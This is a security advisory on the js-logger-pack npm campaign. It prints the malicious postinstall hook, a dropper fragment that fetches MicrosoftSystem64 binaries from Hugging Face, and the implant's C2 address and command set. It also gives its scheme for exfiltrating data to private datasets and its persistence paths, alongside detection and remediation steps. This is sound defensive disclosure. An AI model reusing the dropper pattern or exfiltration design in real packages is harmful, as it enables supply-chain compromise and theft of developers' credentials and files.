critical
CVE
Not assigned
CWE
CWE-506, CWE-494, CWE-522
Affected Surface
js-logger-pack 0.0.1 through 1.1.27, terminal-logger-utils 1.1.2, ts-logger-pack 1.1.3, pretty-logger-utils 1.0.0, pinno-loggers 1.0.0, Lordplay/system-releases Hugging Face repository, Developer workstations and CI runners on Windows, macOS, and Linux that installed affected npm packages
js-logger-pack has evolved from a fake npm logger into a cross-platform implant delivery chain. The latest public analysis shows the operator using Hugging Face for two roles at once: hosting MicrosoftSystem64 binaries and storing stolen victim data inside private Hugging Face datasets.
SafeDep first documented the malicious npm package in April. JFrog later extracted the current MicrosoftSystem64 second stage and showed that the Windows, macOS, and Linux binaries are Node.js Single Executable Application containers carrying the same embedded JavaScript implant. Cyber Security News reported on 28 May that the campaign remained active, with victims monitored in near real time and multiple related npm packages participating in the distribution chain.
Affected package chain
Primary package:
js-logger-pack 0.0.1 through 1.1.27
Related May 2026 logger packages:
terminal-logger-utils 1.1.2
ts-logger-pack 1.1.3
pretty-logger-utils 1.0.0
pinno-loggers 1.0.0
The first family, js-logger-pack, began as a fake logger with a benign-looking dist/index.js. Weaponized versions used postinstall execution, and early builds also loaded malicious code when the package was imported. The later terminal-logger-utils cluster uses the same basic pattern: dependency installation triggers an obfuscated dropper, which downloads a platform-specific second stage.
Install-time execution
JFrog’s analysis of js-logger-pack@1.1.27 shows a simple malicious trigger hidden behind a plausible logger package:
{
  "scripts": {
    "postinstall": "node print.cjs"
  }
}
The package-stage script detaches itself from the package manager, selects a platform binary, downloads it from Hugging Face, and launches it in the background:
const { spawn } = require("child_process");

// Second-stage binaries are served from a Hugging Face model repository,
// keyed by platform and architecture.
const BINARY_BASE_URL = "https://huggingface.co/Lordplay/system-releases/resolve/main";
const DOWNLOAD_MAP = {
  "win32-x64": "MicrosoftSystem64-win.exe",
  "linux-x64": "MicrosoftSystem64-linux",
  "darwin-x64": "MicrosoftSystem64-darwin-x64",
  "darwin-arm64": "MicrosoftSystem64-darwin-arm64"
};

// The script re-launches itself detached with stdio ignored, so npm install
// returns normally while the dropper keeps running in the background.
spawn(process.execPath, ["print.cjs", "--detached"], {
  detached: true,
  stdio: "ignore"
}).unref();
The related terminal-logger-utils package uses utils.cjs as the obfuscated dropper. Package-level details differ, but the behavior is the same class of risk: untrusted postinstall code fetches a remote binary, writes it to a user data directory, marks it executable, and registers persistence.
MicrosoftSystem64 implant
The second-stage payload is named MicrosoftSystem64 to blend into process lists and filesystem paths. JFrog extracted the embedded NODE_SEA_BLOB from the platform binaries and found that the malicious logic is the same JavaScript bundle across PE, Mach-O, and ELF wrappers.
The startup behavior includes:
- setting the process title to MicrosoftSystem64
- registering persistence on Windows, macOS, or Linux
- connecting to 195[.]201[.]194[.]107:8010 over WebSocket and HTTP
- monitoring clipboard contents
- starting platform-specific keylogging
- polling Hugging Face for updates through version.txt
- resuming failed uploads from local state under .pcl-state
The task protocol gives the operator filesystem and implant-control primitives:
ping
get_system_info
list_drives
list_dir
read_text_file
read_file
write_file
scan_files
send_tdata
upload_folder_hf
clear_sessions
update_agent
deploy_binary
This is not a narrow credential grabber. It is a remote-control agent that can read and write arbitrary user-accessible files, deploy more binaries, and exfiltrate selected directories on demand.
Hugging Face as C2-adjacent infrastructure
The campaign abuses Hugging Face in two distinct places.
First, the npm dropper downloads platform binaries from:
https://huggingface.co/Lordplay/system-releases/resolve/main/MicrosoftSystem64-win.exe
https://huggingface.co/Lordplay/system-releases/resolve/main/MicrosoftSystem64-darwin-x64
https://huggingface.co/Lordplay/system-releases/resolve/main/MicrosoftSystem64-darwin-arm64
https://huggingface.co/Lordplay/system-releases/resolve/main/MicrosoftSystem64-linux
Second, the implant can upload stolen folders to private Hugging Face datasets. JFrog documented an upload_folder_hf task where the controller supplies an hfToken, hfUsername, target path, and uploadId. The implant compresses the requested path, creates or reuses a private dataset named from the victim agent and path, uploads the archive with the Hugging Face client library, and tells the Hetzner controller when the upload is complete.
That design keeps bulk stolen data off the attacker’s visible C2 server:
victim host
-> MicrosoftSystem64 task: upload_folder_hf
-> gzip archive under temp directory
-> private Hugging Face dataset
-> /api/validate/hf-upload-complete notification to 195.201.194.107:8010
The same implant supports clear_sessions, which kills browser processes and destroys session stores. Combined with keylogging, this can force victims to reauthenticate and then capture the new credentials.
Persistence artifacts
Windows:
Scheduled task: \MicrosoftSystem64
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftSystem64
%LOCALAPPDATA%\MicrosoftSystem64.exe
%LOCALAPPDATA%\MicrosoftSystem64.vbs
%LOCALAPPDATA%\.registered
macOS:
~/Library/LaunchAgents/com.launchkeeper.MicrosoftSystem64.plist
~/Library/Application Support/MicrosoftSystem64
~/Library/Application Support/.registered
/tmp/.sys_.swift
/tmp/.sys_*_bin
Linux:
~/.config/systemd/user/MicrosoftSystem64.service
~/.config/autostart/MicrosoftSystem64.desktop
~/.local/share/MicrosoftSystem64
~/.local/share/.registered
~/.pcl-data/offline-queue.jsonl
~/.pcl-state/uploads.json
Early js-logger-pack builds also appended an attacker SSH key into ~/.ssh/authorized_keys on Linux, creating a direct shell backdoor if SSH was reachable.
Remediation
Any machine that installed an affected package should be treated as fully compromised. Removing the npm package is not sufficient because the payload installs OS-level persistence and can deploy additional binaries.
Immediate response steps. First, check every project and CI workspace on the host for the affected packages, including as transitive dependencies:
npm ls js-logger-pack terminal-logger-utils ts-logger-pack pretty-logger-utils pinno-loggers
pnpm why js-logger-pack terminal-logger-utils ts-logger-pack pretty-logger-utils pinno-loggers
yarn why js-logger-pack terminal-logger-utils ts-logger-pack pretty-logger-utils pinno-loggers
Then rebuild affected developer workstations or CI runners from known-good images where possible. Rotate all credentials reachable from the host, including npm tokens, GitHub tokens, SSH keys, cloud credentials, database passwords, wallet seeds, API keys, AI-tool tokens, Telegram sessions, browser-saved credentials, and deployment secrets.
Block and search telemetry for:
195.201.194.107:8010
api-sub.jrodacooker.dev
huggingface.co/Lordplay/system-releases
MicrosoftSystem64
Finally, disable lifecycle scripts by default in high-risk CI contexts (ignore-scripts=true in .npmrc, or npm ci --ignore-scripts) and use explicit allowlists for the packages that truly need preinstall, install, or postinstall execution (pnpm's onlyBuiltDependencies setting in package.json is one such mechanism). This campaign exists because package installation is still treated as a trusted code-execution event.
References
- JFrog Research: js-logger-pack Operator Turns Hugging Face into a Malware CDN
- SafeDep: Malicious npm Package js-logger-pack Ships a Multi-Platform WebSocket Stealer
- Cyber Security News: MicrosoftSystem64 Malware Uses HuggingFace Datasets
- GBHackers: Malicious npm Package Hijacks Hugging Face for Malware Delivery
- GitHub Advisory: Malicious code in js-logger-pack
- CWE-506 Embedded Malicious Code